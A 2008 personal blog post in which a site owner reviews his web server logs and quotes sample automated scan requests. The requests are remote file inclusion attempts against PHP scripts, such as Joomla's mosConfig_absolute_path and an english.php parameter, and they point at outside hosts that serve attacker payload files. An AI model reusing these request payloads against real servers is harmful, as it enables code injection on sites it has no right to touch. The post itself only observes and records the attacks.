Browsing through the web logs looking fo ... / 2008-08-26

2008-08-26 Browsing through the web logs looking fo ...
Browsing through the web logs looking for any problems shows heaps of IPs trying to find vulnerable php scripts to break into using an approach of constructing lots of urls with the vulnerable script and the right parameters at the end. Sometimes scans from one IP mingling with scans from another IP. Samples:
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="=http://www.ganzkoerperpflege.at/files/oye.txt">http://www.ganzkoerperpflege.at/files/oye.txt</a>?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET /~koos/newstag.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:40 +0200] "GET /~koos/newstag.cgi/security//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
74.55.98.10 - - [26/Aug/2008:15:53:50 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="http://visitingphysicians.com/hrjobs_contacts/r.txt">http://visitingphysicians.com/hrjobs_contacts/r.txt</a>?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.813"
193.142.215.12 - - [26/Aug/2008:21:46:07 +0200] "GET /~koos/error.php?dir=<a href="http://starthost.us/pemlk/dark/safe.txt">http:/www.starthost.us/pemlk/darl/safe.txt</a>?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"
The one that puzzles me because I see a lot of it and can't find the associated vulnerability:
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/spam/english.php?u=<a href="http://javva.com/id.txt">http://javva.com/id.txt</a>? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 901 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
Not an advertisment for php, this.

Tags: , , ,

IPv6 check

Running test...
, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred. PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers

RSS
Meningen zijn die van mezelf, wat ik schrijf is beschermd door auteursrecht. Sommige publicaties bevatten een expliciete vermelding dat ze ongevraagd gedeeld mogen worden.
My opinions are my own, what I write is protected by copyrights. Some publications contain an explicit license statement which allows sharing without asking permission.
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: newsitem.cgi,v 1.55 2021/11/09 13:09:49 koos Exp $ in 0.006066 seconds.